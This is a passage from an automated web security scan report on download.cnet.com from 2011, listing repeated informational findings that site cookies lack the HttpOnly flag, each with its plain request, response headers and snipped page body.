Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /1770-20_4-0.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1770-20_4-0.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: nb
Expires: Wed, 12 Jan 2011 13:01:01 GMT
Edge-Control: max-age=300
Age: 313
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837274322; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=300
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 39010

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Search -
...[SNIP]...

11.50. http://download.cnet.com/8300-2007_4-12.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8300-2007_4-12.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8300-2007_4-12.xml HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:20 GMT
Edge-Control: max-age=360
Age: 115
Content-Type: text/xml;charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837275148; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 55525

<?xml version="1.0" encoding="UTF-8"?>


<!-- young tee -->


<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<link>http://download.cnet
...[SNIP]...

11.51. http://download.cnet.com/8301-2007_4-20015771-12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20015771-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20015771-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:19 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:00:36 GMT
Edge-Control: max-age=360
Age: 404
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:19 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowLat=1294837280385; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:19 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:19 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:24 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 76026

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Trend Micro bets on the cloud | The Download Blog - Downl
...[SNIP]...

11.52. http://download.cnet.com/8301-2007_4-20027809-12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:47 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:40:47 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:04:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowLat=1294803287158; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:34:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:34:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:34:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 69379

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Android lands cloud security from Trend Micro | The Downl
...[SNIP]...

11.53. http://download.cnet.com/8301-2007_4-20027809-12.html--

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html--

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html-- HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:24 GMT
Via: HTTP/1.0 phx1-rb-dl-app7.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:24 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:24 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowLat=1294837284526; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:24 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:24 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:29 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 75826

<!DOCTYPE html>


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head>


<title>Android lands cloud se
...[SNIP]...

11.54. http://download.cnet.com/8301-2007_4-20027865-12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027865-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027865-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:32 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:32 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:32 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowLat=1294837292036; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:32 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:32 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:37 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 64987

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>It's a black-and-white world: iPhone apps of the week | T
...[SNIP]...

11.55. http://download.cnet.com/download-blog/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /download-blog/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download-blog/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:47 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:05:47 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowLat=1294837306898; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 104182

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Software news, tips and opinions from Download.com editor
...[SNIP]...

11.56. http://download.cnet.com/mac/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mac/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mac/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:49 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:06:58 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 51
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:49 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowLat=1294837309101; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:49 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:49 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:54 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=986
Connection: Keep-Alive
Content-Length: 99322

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mac - Fr
...[SNIP]...

11.57. http://download.cnet.com/mobile-downloads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mobile-downloads/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile-downloads/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:50 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:50 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowLat=1294837310099; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 78960

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mobile -
...[SNIP]...

11.58. http://download.cnet.com/webware-apps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /webware-apps/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webware-apps/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:54 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app8.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:54 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:54 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowLat=1294837313774; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:54 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:54 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:59 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 36086

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Webware
...[SNIP]...

11.59. http://download.cnet.com/windows/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /windows/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

